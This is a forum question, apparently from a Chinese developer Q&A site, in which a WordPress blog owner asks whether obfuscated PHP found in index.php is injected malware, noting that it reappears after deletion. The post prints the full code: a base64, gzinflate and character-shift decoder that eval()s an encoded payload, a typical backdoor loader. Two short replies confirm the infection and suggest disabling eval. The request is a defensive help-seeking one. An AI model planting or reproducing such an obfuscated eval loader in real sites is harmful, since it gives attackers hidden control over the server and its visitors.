一个wordpress博客,index.php出现以下代码是不是被挂马了

这段代码删除后,会再次自动产生,应该是被篡改了

''
<?php function dPORY($ttlQe)
{
$ttlQe=gzinflate(base64_decode($ttlQe));
for($i=0;$i<strlen($ttlQe);$i++)
{
$ttlQe[$i] = chr(ord($ttlQe[$i])-1);
}
return $ttlQe;
}eval(dPORY("fVNhT9swEP2Of8VRVaRBkIzyYROhaGgKYxKbEITxYZoi13ETgxN7ttOuKvvtOyeFtdtEJMvJnd97d88XAHyIsOdSqsU5Y9zaUXZzl4YJmbUNc0I1sJ0dFsLABGZUWh6uyPCRLycwzG/Tm6/pzbfBZZZd53f4lZ9/TL9kg+8JGc6pFMUzJiFiNrLOaIVcCD4IVKnaINydrA88PW1lqSj67P+SVm2mALaT9Su4beRWslSqlPxPOiQrgi5VnBbcjIIPqnG8cYfZUvMTx3+6uHK1TFhFjeVuUk7Hx0fjAA1EzEvrzrS8j8yE5N4L3PKSu5z1dHYUVM7pkziuo+Mj81YyVUdO6fjBMr8iXWkkBc/BWaV6ooT8Ijvo5+5aaG8P/P2EZGdFulPBqWVGaAcOq50MunIf6Jz20QFYwyaDtfBisYiWglExfjN+F6E+6kYPdnB2GvfHz4KE7KCg4a41zbo5X0K8v09gHy4M9gJOgas43CtTXBucGKBaS6T1sxRBVgnbNQ+F4rYJHO5Am6WrRFMewLR1IBUtrOdb6MOpVOVh77x3ABaVYFUHRVABjktpN6RQ26O7AnDVPEIeT/VeU/ZIy42yMBqT58qzV3g2op6x01Wt01ipcC/8c2pgqpTsaAs+Ew0fBffdr5Bnl+nn9DY46KYAB8OrwpXv8i+BtJkL9LDGeehkMl5rSR33nIb/aIXhI8D7bWiNL3l+8ekqzXMIIYIg/tetAMLkNw=="));?>
''

阅读 3.5k
2 个回答

是啊。。。。。。

可以禁用eval函数

撰写回答
你尚未登录,登录后可以
  • 和开发者交流问题的细节
  • 关注并接收问题和回答的更新提醒
  • 参与内容的编辑和改进,让解决方法与时俱进
推荐问题